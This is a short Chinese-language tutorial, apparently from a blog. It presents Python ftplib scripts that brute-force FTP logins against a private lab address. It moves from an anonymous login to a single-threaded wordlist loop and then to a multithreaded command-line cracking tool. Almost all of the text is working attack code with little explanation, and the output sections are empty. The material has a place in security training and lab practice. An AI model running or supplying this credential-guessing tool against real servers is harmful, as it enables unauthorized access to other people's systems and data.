python ftplib模块 爆破ftp登录用户名和密码

1.连接ftp服务器

import ftplib
ftp = ftplib.FTP()
ftp.connect('192.168.50.130', 21)
ftp.login("anonymous","")    #用户为匿名，密码为空
list = ftp.retrlines('list')     #此时可以获得当前ftp目录下的所有文件的信息
print(list)

运行结果：

2.ftp登录用户名和密码单线程爆破

import ftplib
ftp = ftplib.FTP()
for username in open('ftp_user.txt'):
	for password in open('ftp_pwd.txt'):
            username = username.replace('\n','')
            password = password.replace('\n','')
            # print(username+'|'+password)
            try:
                ftp.connect('192.168.50.130', 21)
                ftp.login(username,password)
                print(username+'|'+password+'| ok')
                list = ftp.retrlines('list')     #此时可以获得当前ftp目录下的所有文件的信息
                print(list)
            except ftplib.all_errors:
                print("error")

ftp_pwd.txt:

ftp_user.txt:

运行结果：

3.多线程爆破

ftp服务器设置的最多8个线程

import ftplib,sys,queue,threading
def ftp_brute(ip,port):
    ftp = ftplib.FTP()
    ftp.connect(ip,port)
    while not q.empty():
        dict = q.get()
        dict = dict.split('|')
        username = dict[0]
        password = dict[1]
        try:
            ftp.login(username,password)
            print(username+'|'+password+'| ok')
            list = ftp.retrlines('list')     #此时可以获得当前ftp目录下的所有文件的信息
            print(list)
        except ftplib.all_errors:
            print(username + '|' + password + '| no')
            pass
if __name__ == '__main__':
    ip = sys.argv[1]
    port = int(sys.argv[2])
    userfile = sys.argv[3]
    passfile = sys.argv[4]
    threading_num = int(sys.argv[5])
    q = queue.Queue()
    for username in open(userfile):
        for password in open(passfile):
            username = username.replace('\n','')
            password = password.replace('\n','')
            # print(username+'|'+password)
            q.put(username + '|' + password)
    for x in range(threading_num):
        t = threading.Thread(target=ftp_brute,args=(ip,port))
        t.start()

运行结果：